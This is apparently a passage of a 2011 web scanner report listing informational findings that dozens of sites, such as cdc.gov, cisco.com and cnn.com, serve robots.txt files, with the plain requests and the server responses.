Content-Type: text/plain; charset=utf-8
Content-Length: 60
Last-Modified: Mon, 18 Oct 2010 19:13:05 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

# robots.txt for www
User-agent: *
Disallow: /ext/
Allow: /
24.156. http://www.cbc.ca/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbc.ca
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cbc.ca

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 31 Mar 2011 19:58:16 GMT
ETag: "cc016-360-b6cee600"
X-Origin-Server: web23:sb10
Content-Type: text/plain
Date: Sat, 02 Apr 2011 14:00:02 GMT
Content-Length: 864
Connection: close
X-N: S

# robots, scram
#place all comments here as they cannot be inline.
# $Id: cbc.ca-robots.txt 2844 2010-12-14 16:41:33Z nashedm $
# /cp/ - RT50606
# /photogallery/*.xml$ - HD61301

User-agent: *
Disallo
...[SNIP]...
24.157. http://www.cbs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cbs.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 30 Nov 2010 20:48:00 GMT
X-Real-Server: ws3228.drt.cbsig.net
Content-Type: text/plain; charset=ISO-8859-1
Date: Sat, 02 Apr 2011 13:27:27 GMT
Content-Length: 7487
Connection: close

Sitemap: http://www.cbs.com/sitemap-index-videos.xml
Sitemap: http://www.cbs.com/sitemap-index-users.xml

User-agent: *
Disallow: /upload/0808/2426664/
Disallow: /34h3t08h/
Disallow: /76Vv_7__5N__w_Jz
...[SNIP]...
24.158. http://www.cbssports.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbssports.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cbssports.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:08 GMT
Server: Apache
Last-Modified: Mon, 09 Aug 2010 19:03:34 GMT
Accept-Ranges: bytes
Content-Length: 55
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:25:08 GMT
Vary: Accept-Encoding
X-Media: ws1173-fe.tm
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /info/search
Disallow: /data/*
24.159. http://www.cdc.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cdc.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cdc.gov

Response

HTTP/1.0 200 OK
Content-Length: 924
Content-Type: text/plain
Last-Modified: Mon, 24 Mar 2008 18:22:49 GMT
Accept-Ranges: bytes
ETag: "363a9110dc8dc81:ec94"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:44:56 GMT
Connection: close

# Ignore FrontPage files
User-agent: *
Disallow: /_borders
Disallow: /_derived
Disallow: /_fpclass
Disallow: /_overlay
Disallow: /_private
Disallow: /_themes
Disallow: /_vti_bin
Disallow: /_v
...[SNIP]...
24.160. http://www.cdkitchen.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cdkitchen.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cdkitchen.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:54 GMT
Server: Apache/1.3.42 (Unix) PHP/4.4.7 mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Fri, 18 Mar 2011 04:48:04 GMT
ETag: "2d79c00-3167-4d82e404"
Accept-Ranges: bytes
Content-Length: 12647
Connection: close
Content-Type: text/plain

# This is just for bots that actually obey robots.txt files. We block bots
# in other ways as well.

User-agent: Yahoo-MMCrawler
Disallow: /

User-agent: dotbot
Disallow: /

User-agent: MLBot
Disall
...[SNIP]...
24.161. http://www.cduniverse.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cduniverse.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cduniverse.com

Response

HTTP/1.0 200 OK
Content-Length: 601
Content-Type: text/plain
Last-Modified: Wed, 31 Mar 2010 14:20:05 GMT
Accept-Ranges: bytes
ETag: "80d82b42ddd0ca1:133d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:43:20 GMT
Connection: close

###########################################################################
## Start New Site Disallows ##
##############################################
...[SNIP]...
24.162. http://www.celebrity-gossip.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.celebrity-gossip.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.celebrity-gossip.net

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (CentOS)
Last-Modified: Thu, 13 Jan 2011 22:00:03 GMT
Cache-Control: max-age=1209600
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Content-Length: 1628
X-Cacheable: YES
Date: Sat, 02 Apr 2011 13:45:11 GMT
X-Varnish: 2210099810 2210006526
Age: 410
Via: 1.1 varnish
Connection: close
X-Cache: HIT
X-Cache-Hits: 5

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...
24.163. http://www.census.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.census.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.census.gov

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:12:47 GMT
Server: Apache
Last-Modified: Thu, 15 Jul 2004 18:05:49 GMT
ETag: "6e4361-ad-3df458d731940"
Accept-Ranges: bytes
Content-Length: 173
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /fpdsp/
Disallow: /system/
Disallow: /dcmd/
Disallow: /population/www/coop/server/
Disallow: /cgi-bin/
Disallow: /test/
Disallow: /hrd/www/title13/
24.164. http://www.chacha.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chacha.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chacha.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: sessionId=YmEwYWIxYmItNDg5NC00YmY1LThjMWItNzRhNjYyNjhhMzQzo6b4; Expires=Sat, 23-Apr-2011 08:43:29 GMT; Path=/
Set-Cookie: sessionId=NjIyOWUyM2MtOTUxYy00YjliLTkxNjQtOTQ5OGM1ZGM3Zjk1o6b4; Expires=Sat, 23-Apr-2011 08:43:29 GMT; Path=/
Set-Cookie: wuid=M2Y3YzFjMjItMmI3My00NTEwLWE0MjYtZWYxMTRkYzVkNWY4o6b4; Expires=Sun, 01-Apr-2012 12:43:29 GMT; Path=/
Set-Cookie: seenUser=dHJ1ZQ%3D%3Do6b4; Expires=Fri, 01-Jul-2011 12:43:29 GMT; Path=/
Set-Cookie: sessionId=OGUzZGVhMGQtYTczMi00NmQ4LTkyMTEtOTQ4YTJlOGUwODQ4o6b4; Expires=Sat, 23-Apr-2011 08:43:29 GMT; Path=/
Content-disposition: inline
Content-Type: text/plain;charset=UTF-8
Content-Language: en-US
Content-Length: 470
Date: Sat, 02 Apr 2011 12:43:28 GMT
Connection: close

Sitemap: http://www.chacha.com/sitemap.xml.gz

User-agent: *
Disallow: /flagAbusiveQuestion/
Disallow: /flagFunnyQuestion/
Disallow: /account/
Disallow: /addQuestionComment
Disallow: /addTopicC
...[SNIP]...
24.165. http://www.charlotteobserver.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charlotteobserver.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.charlotteobserver.com

Response

HTTP/1.0 200 OK
Server: Apache/1.3.41
Last-Modified: Mon, 12 Jul 2010 21:15:00 GMT
ETag: "192f210-89-4c3b85d4"
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:58:32 GMT
Content-Length: 137
Connection: close

User-Agent: *
Allow: /

Sitemap: http://www.charlotteobserver.com/sitemap.xml
Sitemap: http://www.charlotteobserver.com/news_sitemap.xml
24.166. http://www.cheapoair.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheapoair.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cheapoair.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 08 Oct 2010 20:22:52 GMT
Accept-Ranges: bytes
ETag: "4f306b952667cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:36:25 GMT
Connection: keep-alive
Content-Length: 405

User-agent: InternetSeer.com
Disallow: /
User-agent: *
Disallow: /default.aspx?tabid=3222
Disallow: /default.aspx?tabid=1688*
Disallow: /default.aspx?tabid=4298*
Disallow: /default.aspx?tabid=16
...[SNIP]...
24.167. http://www.chemistry.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chemistry.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chemistry.com

Response

HTTP/1.1 200 OK
Content-Length: 122
Content-Type: text/plain
Last-Modified: Wed, 23 Feb 2011 15:22:28 GMT
Accept-Ranges: bytes
ETag: "dc8927b6dd3cb1:53b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:43:53 GMT
Connection: keep-alive

User-agent: *
Disallow: /tools
Disallow: /api
Disallow: /redalert
Disallow: /keynote
Disallow: /bin
Disallow: /sites
24.168. http://www.chevrolet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chevrolet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chevrolet.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: W/"482-1278690994000"
Last-Modified: Fri, 09 Jul 2010 15:56:34 GMT
X-Pillar-Name: VAPROD
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:50:53 GMT
Content-Length: 482
Connection: close

User-agent: *
Disallow:/mds/css/
Disallow:/mds/js/
Disallow:/en/css/
Disallow:/en/js/
Disallow:/xml/
Disallow:/services/
Disallow:/messaging/
Disallow:/tools/byo/
Disallow:/tools/comparator/
...[SNIP]...
24.169. http://www.chicagotribune.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chicagotribune.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chicagotribune.com

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
ntCoent-length: 363
Content-Type: text/plain
P3P: policyref="http://www.chicagotribune.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Last-Modified: Thu, 17 Dec 2009 03:50:28 GMT
ETag: "16b-4b29aa84"
Cache-Control: private, max-age=125
Date: Sat, 02 Apr 2011 13:32:26 GMT
Content-Length: 363
Connection: close

User-agent: *
Disallow: *,email.*
Disallow: /search/
Disallow: /about/site/music
Disallow: /about/site/healthtesthomepage
Disallow: /about/site/healthtestfitness
Disallow: /about/site/temp
Disallow: /
...[SNIP]...
24.170. http://www.chilisemailclub.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chilisemailclub.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chilisemailclub.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:01:03 GMT
Server: Apache
Last-Modified: Tue, 08 Mar 2011 16:31:55 GMT
ETag: "1c6006e-78-49dfb267e34c0"
Accept-Ranges: bytes
Content-Length: 120
Cache-Control: max-age=54000
Expires: Sun, 03 Apr 2011 05:01:03 GMT
Vary: Accept-Encoding
P3P: CP="CURa ADMa DEVa IVAa IVDa CONa OUR IND DSP NON COR", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain; charset=UTF-8

# Default robots.txt file, start with this and add any custom rules for your properties.
User-agent: *
Disallow: /.svn/
24.171. http://www.choicehotels.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.choicehotels.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.choicehotels.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 16 Mar 2011 17:35:12 GMT
ETag: "112-49e9cf78ad400"
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 274
Date: Sat, 02 Apr 2011 13:38:56 GMT
Connection: close

User-agent: AdsBot-Google
Disallow: /download/survey/*

User-agent: *
Crawl-delay: 1
Disallow: /ires/
Disallow: /bestrate/
Disallow: /lpga*
Disallow: /signup/*
Disallow: /shtml/CambriaSuites/
...[SNIP]...
24.172. http://www.chow.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chow.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chow.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 09 Oct 2009 01:02:01 GMT
ntCoent-Length: 167
Cneonction: close
Content-Type: text/plain
Vary: Host
Cache-Control: private, max-age=86400
Date: Sat, 02 Apr 2011 13:33:05 GMT
Content-Length: 167
Connection: close

User-agent: *
Disallow: /account/
Disallow: /chowpickawards
Disallow: /action/rd
Disallow: /account/signup

Sitemap: http://www.chow.com/sitemap-index-chow.xml
24.173. http://www.christianbook.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.christianbook.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.christianbook.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:13 GMT
Server: Apache/1.3.42 (Unix) mod_perl/1.31
Last-Modified: Tue, 23 Feb 2010 16:55:43 GMT
ETag: "6-1210-4b84088f"
Accept-Ranges: bytes
Content-Length: 4624
Keep-Alive: timeout=120, max=495
Connection: Keep-Alive
Content-Type: text/plain

# Welcome to Christianbook.com
# and thanks for asking about our robot rules

User-agent: Googlebot
Disallow: /apps
Disallow: /apps/*
Disallow: /Christian/Books/wishlist
Disallow: /Christian/Books/wi
...[SNIP]...
24.174. http://www.chron.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chron.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chron.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Debian)
Last-Modified: Mon, 17 May 2010 17:10:23 GMT
ETag: "33e-486cd4cdfddc0"
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADM DEVa TAIa PSAa PSDa CONo OUR DELo IND PHY ONL INT STA DEM UNI COM NAV"
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:34:23 GMT
Content-Length: 830
Connection: close

User-agent: Mediapartners-Google*
Disallow: /edgil/
Disallow: /system/
Disallow: /tmp/
Disallow: /westest/
Disallow: /cgi-bin/AT-HCIsearch.cgi
Disallow: /cs/CDA/openstory.hts
Disallow: /content/intera
...[SNIP]...
24.175. http://www.chuckecheese.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chuckecheese.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chuckecheese.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:05 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 11 Jun 2007 19:17:00 GMT
ETag: "578644-88-39a64300"
Accept-Ranges: bytes
Content-Length: 136
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /admin/
Disallow: /email/
Disallow: /flash/
Disallow: /images/
Disallow: /includes/
Disallow: /urchin/

24.176. http://www.cincinnati.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cincinnati.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cincinnati.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:52 GMT
Server: Apache
Last-Modified: Wed, 16 Sep 2009 07:25:01 GMT
ETag: "1081e4c-24-473accc008d40"
Accept-Ranges: bytes
Content-Length: 36
Wx: D=1221 t=1301752252292208 w=4
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /halloween/
24.177. http://www.cisco.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cisco.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cisco.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0
Last-Modified: Wed, 30 Jun 2010 14:57:56 GMT
ETag: "9436c500"
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:39:20 GMT
CDCHOST: ccows-sj-203
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:39:20 GMT
Content-Length: 1303
Connection: close
Set-Cookie: CP_GUTC=72.163.4.166.1301751560421948; path=/; expires=Wed, 26-Mar-36 13:39:20 GMT; domain=.cisco.com

#--------------------------------
User-agent: cisco-googlebot-enterprise
Disallow: /bug-navigator # Bug Data
# Disallow: /cgi-bin # allow test crawls for TAC support content
Disallow: /pcgi-bin # no p
...[SNIP]...
24.178. http://www.citibank.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citibank.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.citibank.com

Response

HTTP/1.1 200 OK
Server: ""
Date: Sat, 02 Apr 2011 13:35:26 GMT
Content-length: 124
Content-type: text/plain
Last-modified: Thu, 01 Jul 2010 15:17:05 GMT
Accept-ranges: bytes
Connection: close

User-agent: *
Sitemap: http://www.citi.com/domain/infra/citi_sitemap.xml
Disallow: /uae/gcb/pm_google/form.htm
Allow: /
24.179. http://www.city-data.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.city-data.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.city-data.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:12 GMT
Server: Apache
Last-Modified: Fri, 25 Mar 2011 12:33:32 GMT
ETag: "3590cce-2eb-49f4dcd451f00"
Accept-Ranges: bytes
Content-Length: 747
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google
Disallow:

User-agent: Mediapartners-Google*
Disallow:


User-agent: *
Disallow: /forum/search.php*
Disallow: /forum/reputation.php*
Disallow: /forum/newreply.php*
Dis
...[SNIP]...
24.180. http://www.citygridmedia.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citygridmedia.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.citygridmedia.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:12 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/4.4.9
X-Pingback: http://www.citygridmedia.com/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:
24.181. http://www.classesusa.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.classesusa.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.classesusa.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:13 GMT
Server: Apache
Set-Cookie: SERVER_COOKIE=173.193.214.243.1301751193434003; path=/; expires=Mon, 01-Apr-13 13:33:13 GMT
Last-Modified: Wed, 30 Mar 2011 22:50:02 GMT
ETag: "fe807-27-49fbaff409a80"
Accept-Ranges: bytes
Content-Length: 39
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain
Set-Cookie: BIGipServerpl.eduprod=654581770.20480.0000; path=/

User-agent: *
Disallow: /presentations/
24.182. http://www.classifiedads.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.classifiedads.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.classifiedads.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:43 GMT
Server: Apache
Last-Modified: Thu, 10 Mar 2011 20:28:28 GMT
ETag: "1998021-a5-49e26b024f300"
Accept-Ranges: bytes
Content-Length: 165
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /link.php
Disallow: /linkcpa.php
Disallow: /linkint.php
Disallow: /linkoodle.php
Disallow: /linkindeed.php

Crawl-delay: 3
Request-rate: 1/3
24.183. http://www.classmates.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.classmates.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.classmates.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:30 GMT
Server: Apache
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CON HIS OTPi OUR DELi SAMi PUBi IND OTC"
Last-Modified: Wed, 23 Feb 2011 19:33:22 GMT
ETag: "ee8-4d656102"
Accept-Ranges: bytes
Content-Length: 3816
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /feature
Disallow: /cmo/caliprivacy.jsp
Disallow: /cmo/cookies.jsp
Disallow: /cmo/fragments
Disallow: /cmo/lost
Disallow: /cmo/partners
Disallow: /cmo/photosweepsrules.jsp
Disa
...[SNIP]...
24.184. http://www.clear.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clear.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.clear.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:04 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8r
Last-Modified: Tue, 01 Feb 2011 19:20:03 GMT
ETag: "5c805-263-49b3d6b56bec0"
Accept-Ranges: bytes
Content-Length: 611
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# robot.txt for www.clear.com
# match all crawlers
User-agent: *
# keep them out of the following
Disallow: /account-usage/
Disallow: /charts/
Disallow: /drivers/
Disallow: /email_html/
Disallow: /inc
...[SNIP]...
24.185. http://www.cmt.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmt.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cmt.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Wed, 23 Dec 2009 23:14:57 GMT
ETag: "474acb8-35-47b6d7dad3e40"
Accept-Ranges: bytes
Content-Length: 53
Content-Type: text/plain
Cache-Control: max-age=1800
Date: Sat, 02 Apr 2011 13:38:06 GMT
Connection: close

User-agent: *
Disallow: /search/
Disallow: /inhouse/
24.186. http://www.cnbc.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnbc.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cnbc.com

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 14:59:21 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/plain
Via: 1.1 C aicache6
Content-Length: 305
X-Aicache-OS: 64.210.194.245:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Sat, 02 Apr 2011 14:59:21 GMT

# robots.txt file for www.cnbc.com

User-agent: *
Disallow: error404.aspx

Sitemap: http://www.cnbc.com/xml/SitemapIndexCNBC.xml
Sitemap: http://syndication.cnbc.com/sitemaps/sitemap_static.xml
Sitema
...[SNIP]...
24.187. http://www.cnet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cnet.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:05 GMT
Server: Apache
Vary: Host
Accept-Ranges: bytes
Content-Length: 3923
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=15, max=995
Connection: Keep-Alive
Content-Type: text/plain

"# $Source: /cvs/main/ops/config/global/w/robots.txt,v $"
# $Revision: 1.26 $
#
User-agent: *
Disallow: /Ads/
Disallow: /redir/
# Disallow: /i/ is removed per 190723
Disallow: /css/
Disallow:
...[SNIP]...
24.188. http://www.cnn.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnn.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cnn.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:38:16 GMT
Server: Apache
Set-Cookie: CG=US:TX:Dallas; path=/
Accept-Ranges: bytes
Cache-Control: max-age=60
Expires: Sat, 02 Apr 2011 12:39:16 GMT
Content-Length: 749
Content-Type: text/plain
Connection: close

Sitemap: http://www.cnn.com/sitemap_index.xml
Sitemap: http://www.cnn.com/sitemap_news.xml
Sitemap: http://www.cnn.com/video_sitemap_index.xml
Sitemap: http://www.cnn.com/sitemap_election_2010.xml
Use
...[SNIP]...
24.189. http://www.cobaltnitra.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cobaltnitra.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cobaltnitra.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:56:36 GMT
Server: Apache/2.2.3 (Oracle) DAV/2 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: click_tracker=10.64.64.6.1301752596424579; path=/; expires=Mon, 01-Apr-13 13:56:36 GMT
Last-Modified: Thu, 09 Aug 2007 21:48:22 GMT
ETag: "1e7efe0-19a-4374b379db580"
Accept-Ranges: bytes
Content-Length: 410
Content-Type: text/plain
Set-Cookie: BIGipServernitra.staticweb=520634378.20480.0000; path=/
X-Cache: MISS from backend02-1
X-Cache-Lookup: MISS from backend02-1:4001
X-Cache: MISS from frontend02
X-Cache-Lookup: MISS from frontend02:3128
Via: 1.0 backend02-1 (squid), 1.0 frontend02 (squid)
Proxy-Connection: close

User-agent: *
Disallow: /en_US/HoursAndDirections.jsp
Disallow: /en_US/DrivingDirections.jsp
Disallow: /es_US/HoursAndDirections.jsp
Disallow: /es_US/DrivingDirections.jsp
Disallow: /en_CA/HoursAndDir
...[SNIP]...
24.190. http://www.colbertnation.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.colbertnation.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.colbertnation.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.1
X-Powered-By: PHP/5.3.1
Accept-ESI: 1.0
Content-Disposition: inline; filename=robots.txt
Content-Length: 75
Content-Type: text/plain
Cache-Control: max-age=1375
Expires: Sat, 02 Apr 2011 14:42:04 GMT
Date: Sat, 02 Apr 2011 14:19:09 GMT
Connection: close

Sitemap: http://www.colbertnation.com/sitemap.xml
User-agent: *
Disallow:
24.191. http://www.collegeboard.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.collegeboard.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.collegeboard.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:02 GMT
Server: Apache
Last-Modified: Mon, 31 Jan 2011 21:28:07 GMT
ETag: "ce-49b2b177fe7c0"
